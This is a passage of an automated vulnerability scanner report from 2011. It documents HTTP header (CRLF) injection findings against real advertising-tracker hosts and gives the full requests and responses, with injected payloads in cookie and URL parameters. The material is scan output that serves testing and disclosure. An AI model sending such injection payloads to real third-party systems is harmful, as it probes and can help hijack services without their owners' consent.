GET /webtracker/track2.html?method=track&pid=30120&uclkt=1&alh=http%3A//mzima.net/&avc=6ab95%0d%0af1c7ac10bc3&source=&keyword=&ref=&pageTitle=PacketExchange%20-%20MZIMA%20-%20Global%20IP%20/%20Internet%20bandwidth%2C%20Peering%2C%20Content%20Delivery%20/%20CDN%2C%20Ethernet%20Private%20Line%20and%20Colocation%20/%20Datacenter%20Services&pageUrl=http%3A%2F%2Fmzima.net%2F&java=1&amcs=0.44739386485889554 HTTP/1.1
Host: live.activeconversion.com
Proxy-Connection: keep-alive
Referer: http://mzima.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _wt_31021=1296942871924|f64d-6178-34ed-5f2e12df7d201ca|0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:37:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B277C118513B36E9839C0F3995AFC9C6; Path=/webtracker
Set-Cookie: _wt_30120="1297694251289|6ab95
f1c7ac10bc3|0"; Max-Age=630720000;Path=/; HttpOnly
P3P: policyref="http://www.activeconversion.com/w3c/p3p.xml", CP="NOI DSP LAW PSA OUR IND STA NAV COM"
Connection: close
Content-Type: image/png
Content-Length: 68

.PNG
.
...IHDR.....................IDATx.c`...............IEND.B`.

1.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload af142%0d%0ac17363f719d was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=12327&pi=-&xs=3&pu=http%253A//www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html%2523incart_mce%2526ifu%253D&v=5.5&cb=25687 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298064793; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5af142%0d%0ac17363f719d; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:29 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 14 Feb 2011 01:52:29 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|60183^1^1298252249|50212^1^1297794990|50224^1^1298035587|50382^1^1298064793; path=/; expires=Mon, 21-Feb-11 01:37:29 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297647449^1297649249|12327^1297647449^1297649249; path=/; expires=Mon, 14-Feb-11 02:07:29 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|53575|52615|54490|52614|54459|52611|51186|52957|52947; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Mon, 14-Feb-11 07:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5af142
c17363f719d,5bf47211ff9e0cf44f4ee113e10a619f; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTM1NzU6NTI2MTU6NTQ0OTA6NTI2MTQ=; expires=Thu, 09-Feb-12 01:37:29 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

1.48. http://tacoda.at.atwola.com/rtx/r.js [si parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload a3bf5%0d%0af4a1b2b0c20 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=a3bf5%0d%0af4a1b2b0c20&pi=-&xs=3&pu=http%253A//www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html%2523incart_mce%2526ifu%253D&v=5.5&cb=25687 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; JEB2=4D4EEFDF6E651A440C6EAF39F00070C8; ANRTT=50213^1^1297712974|50220^1^1298050667|50204^1^1297630711|50237^1^1297629772|50228^1^1297628320|50229^1^1297629635|60181^1^1297628679|50209^1^1297628745|60183^1^1298036705|60369^1^1297628933|50212^1^1297794990|60329^1^1297630573|60190^1^1297629531|60136^1^1297629993|50219^1^1297630298|60182^1^1297630370|60185^1^1297630433|61165^1^1297630484|50224^1^1298035587|50382^1^1298064793; TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|52615|54490|52614|54459|52611|51186|52957|52947|53330; N=2:3e9134c20f00f3af730f8d42d1020fd5,3e9134c20f00f3af730f8d42d1020fd5; ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTI2MTU6NTQ0OTA6NTI2MTQ6NTQ0NTk=

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:37:28 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 14 Feb 2011 01:52:28 GMT
Set-Cookie: ANRTT=50213^1^1297712974|50220^1^1298050667|60183^1^1298252248|50212^1^1297794990|50224^1^1298035587|50382^1^1298064793; path=/; expires=Mon, 21-Feb-11 01:37:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1297647448^1297649248|a3bf5
f4a1b2b0c20^1297647448^1297649248; path=/; expires=Mon, 14-Feb-11 02:07:28 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|60506|53399|52838|53380|52847|50159|52843|53575|52615|54490|52614|54459|52611|51186|52957|52947; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Mon, 14-Feb-11 07:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:3e9134c20f00f3af730f8d42d1020fd5,5bf47211ff9e0cf44f4ee113e10a619f; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTAxNjA6NTA0MTI6NjE2NzQ6NjA0ODg6NjA3Mzk6NTAwMTI6NjA0OTI6NTAwNzk6NTA0MjI6NjA0OTE6NTAwODU6NTExODQ6NTEwMzY6NTAwOTk6NjA0OTA6NTI4Mzk6NjA1MTI6NjA0MjU6NTQwMzI6NjA1MDY6NTMzOTk6NTI4Mzg6NTMzODA6NTI4NDc6NTAxNTk6NTI4NDM6NTM1NzU6NTI2MTU6NTQ0OTA6NTI2MTQ=; expires=Thu, 09-Feb-12 01:37:28 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|50160|50412|61674|60488|60739|50012|60492|50079|50422|60491|50085|51184|51036|50099|60490|52839|60512|60425|54032|
...[SNIP]...

1.49. http://w55c.net/m.gif [rurl parameter] previous

Summary

Severity:	High
Confidence:	Certain
Host:	http://w55c.net
Path:	/m.gif

Issue detail

The value of the rurl request parameter is copied into the Location response header. The payload a0486%0d%0a6392edd76fb was submitted in the rurl parameter. This caused a response containing an injected HTTP header.

Request

GET /m.gif?rurl=a0486%0d%0a6392edd76fb HTTP/1.1
Host: w55c.net
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; matchadmeld=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 302 Found
P3P: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Location: http://a0486
6392edd76fb
Content-Length: 0
Date: Mon, 14 Feb 2011 01:34:34 GMT
Server: w55c.net

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 08:59:33 CST 2011.